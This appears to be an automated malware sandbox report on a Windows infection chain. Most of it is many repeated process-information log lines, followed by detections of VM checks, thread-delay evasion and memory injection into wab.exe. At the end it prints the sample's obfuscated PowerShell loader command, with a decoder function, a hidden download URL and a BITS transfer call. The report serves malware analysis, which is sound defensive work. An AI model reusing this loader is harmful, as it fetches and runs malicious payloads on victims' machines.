                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 590DFF3
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 7FF8C88ED044
                    Source: C:\Windows\SysWOW64\dialer.exeAPI/Special instruction interceptor: Address: 7FF8C88ED044
                    Source: C:\Windows\SysWOW64\dialer.exeAPI/Special instruction interceptor: Address: 597483A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4303Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5573Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8258Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1433Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6620Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 1020Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep count: 8258 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep count: 1433 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3376Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\dialer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: wscript.exe, 00000000.00000003.2050027325.000001888831C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: wab.exe, 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                    Source: svchost.exe, 00000004.00000002.3341191291.000002A79CE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3339787884.000002A79782B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3339831570.000002A797843000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: wab.exe, 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                    Source: wab.exe, 00000007.00000002.2594065641.0000000008902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhM
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_3_032B027F mov eax, dword ptr fs:[00000030h]9_3_032B027F

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Writes to foreign memory regions
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4030000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: A7FAECJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe 